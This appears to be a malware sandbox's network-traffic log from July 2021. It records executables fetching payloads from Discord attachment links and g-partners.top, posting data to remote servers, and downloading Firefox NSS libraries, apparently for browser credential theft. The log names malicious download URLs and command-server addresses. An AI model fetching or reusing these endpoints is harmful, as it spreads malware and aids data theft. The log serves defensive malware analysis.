                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:26 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ac820d0000223f0e057000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Ftr%2FszBwCumy0KXuwq7aY%2BUBVNJLRoEXAXj5zQ8HWEK7%2F0oGUIJDFStagKOhPzuciJ2rsDqMa3BVcCi6PZL%2BM7F8%2B1bHomkqf0RF9N0l9shjDbpz4SSwBIQjrIB7Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668616b01e60223f-MIA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 138
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        api.ip.sb
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        api.ip.sb
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        api.ip.sb
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        api.ip.sb.cdn.cloudflare.net
                                                                                                                                                                                        api.ip.sb.cdn.cloudflare.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.26.13.31
                                                                                                                                                                                        api.ip.sb.cdn.cloudflare.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.26.12.31
                                                                                                                                                                                        api.ip.sb.cdn.cloudflare.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.75.172
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://api.ip.sb/geoip
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.26.13.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /geoip HTTP/1.1
                                                                                                                                                                                        Host: api.ip.sb
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:28 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ac88d90000d453d9aa2000000001
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=4OY3U%2FTj4uoIrMR8fyaWQe3SCDFnntprO%2FZjW8S2%2FYStmeHY5ZhkbTfvdic8ZhoFHe%2BtL6Cxk0DnLt40pt0YKL6kazrA8Va6ysowgbvbrLz4ViXa6y0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668616bafb23d453-HAM
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/849802777433341954/849807598056112138/Setup2.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        162.159.135.233:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /attachments/849802777433341954/849807598056112138/Setup2.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:30 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 2431039
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Ray: 668616c81e494162-HAM
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Age: 385525
                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                        Content-Disposition: attachment;%20filename=Setup2.exe
                                                                                                                                                                                        ETag: "623c88cc55a2df1115600910bbe14457"
                                                                                                                                                                                        Expires: Sat, 02 Jul 2022 07:16:30 GMT
                                                                                                                                                                                        Last-Modified: Thu, 03 Jun 2021 00:32:00 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                        Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        x-goog-generation: 1622680320138453
                                                                                                                                                                                        x-goog-hash: crc32c=2s+41g==
                                                                                                                                                                                        x-goog-hash: md5=YjyIzFWi3xEVYAkQu+FEVw==
                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                                        x-goog-stored-content-length: 2431039
                                                                                                                                                                                        X-GUploader-UploadID: ABg5-UwRnPDdZRdLdRXMzCRI4FR_NeKC5c0ej5l_JyYhMUQ5byhMSvSHPMCVKU7CtQUvRz0seWeUGniPu5nhULV1Cw
                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=E3GCPW49bg24V6orBzCEsoqX1SL6UTgsiLL7NID3IxmefRp%2BZ13PcUMIzDNKSweir68cLbwgnxXcq1eaeJYBXsaGfMd5bYV0dJxhJ6Z8FHoMHRo1AUnEcaO%2BJ2ZkbsM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        162.159.135.233:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /attachments/849802777433341954/851833670733266955/jooyu.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:32 GMT
                                                                                                                                                                                        Content-Type: application/xml; charset=UTF-8
                                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Ray: 668616d4c907dfe3-FRA
                                                                                                                                                                                        Age: 286
                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                        Expires: Fri, 02 Jul 2021 07:11:46 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                        Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        X-GUploader-UploadID: ADPycdvoZ2xnEl-tf9I9PPFARmx1ntT-pVKl6bUwZUuAjypEpef9u9OssukCcoCalC5bGnazYoZ_WArI1_0sbXRvv800wrCf2w
                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=M9SZ1YhuVyZGrBNPyjTxDlCnjSqtpHnwJZBP%2Bt%2Bc0uiUncSBa%2BBdRaPc9%2BpwqrfXglgA2LzlHBG4lcUE5XuUOGSaeMnZoGaDeu4lpOuxGD3B4UnUvsztz7pLe2DhIIs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.251.36.10
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.17.42
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.19.202
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.168.202
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        216.58.208.106
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.17.106
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.17.138
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        216.58.211.106
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.250.179.138
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        216.58.214.10
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.251.36.42
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.168.234
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.250.179.170
                                                                                                                                                                                        www.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.250.179.202
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        IN A
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        74.114.154.22:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Host: sergeevih43.tumblr.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:35 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Rid: 7b1a7f20c72aa297071436bf357ec6ad
                                                                                                                                                                                        P3p: CP="Tumblr's privacy policy is available here: https://www.tumblr.com/policy/en/privacy"
                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552001
                                                                                                                                                                                        X-Tumblr-User: sergeevih43
                                                                                                                                                                                        X-Tumblr-Pixel-0: https://px.srvcs.tumblr.com/impixu?T=1625210147&J=eyJ0eXBlIjoidXJsIiwidXJsIjoiaHR0cDovL3NlcmdlZXZpaDQzLnR1bWJsci5jb20vIiwicmVxdHlwZSI6MCwicm91dGUiOiIvIn0=&U=HKPJNCFACL&K=2f70e321ab048efd9a8144071a259310426deae8f19796321cbf717c12205751
                                                                                                                                                                                        X-Tumblr-Pixel: 1
                                                                                                                                                                                        Link: <https://assets.tumblr.com/images/default_avatar/octahedron_open_128.png>; rel=icon
                                                                                                                                                                                        Set-Cookie: pfg=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.tumblr.com; secure; HttpOnly
                                                                                                                                                                                        X-UA-Compatible: IE=Edge,chrome=1
                                                                                                                                                                                        X-UA-Device: desktop
                                                                                                                                                                                        Vary: X-UA-Device, Accept, Accept-Encoding
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://g-partners.top/dlc/distribution.php?pub=mixinte
                                                                                                                                                                                        2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        159.65.63.164:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /dlc/distribution.php?pub=mixinte HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        User-Agent: Uvok-6Yh5-3moO-pCUX
                                                                                                                                                                                        Host: g-partners.top
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:31 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                                                                                                        Content-Description: File Transfer
                                                                                                                                                                                        Content-Disposition: attachment; filename=null
                                                                                                                                                                                        Content-Transfer-Encoding: binary
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        vt_ASiQuT3fR9eoJIz5PVk6E.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        74.114.154.22:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Host: sergeevih43.tumblr.com
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:37 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07acaee90000fda9e6a70000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=vGjnMz8BjzgyhNl1YNJQQUBe3qQb9SjTgFZSlc0evfHoQUBEoNSKB2u7t9lxaz45t1LAliY9wyW9Rip0Aeam6ZsUuL8A105wERwEPgKGHL7347r0QkamuwMSkl9IUA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668616f7dea4fda9-PDX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://157.90.127.76/932
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /932 HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                                                                        Content-Length: 25
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:40 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://157.90.127.76/freebl3.dll
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /freebl3.dll HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:40 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 334288
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                                                                        ETag: "519d0-57aa1f0b0df80"
                                                                                                                                                                                        Expires: Sat, 03 Jul 2021 07:16:40 GMT
                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                        X-Cache-Status: EXPIRED
                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://157.90.127.76/mozglue.dll
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /mozglue.dll HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:42 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 137168
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                                                                        ETag: "217d0-57aa1f0b0df80"
                                                                                                                                                                                        Expires: Sat, 03 Jul 2021 07:16:42 GMT
                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                        X-Cache-Status: EXPIRED
                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://157.90.127.76/msvcp140.dll
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:43 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 440120
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                                                                        ETag: "6b738-57aa1f0b0df80"
                                                                                                                                                                                        Expires: Sat, 03 Jul 2021 07:16:43 GMT
                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                        X-Cache-Status: EXPIRED
                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://157.90.127.76/nss3.dll
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /nss3.dll HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:46 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 1246160
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                                                                        ETag: "1303d0-57aa1f0b0df80"
                                                                                                                                                                                        Expires: Sat, 03 Jul 2021 07:16:46 GMT
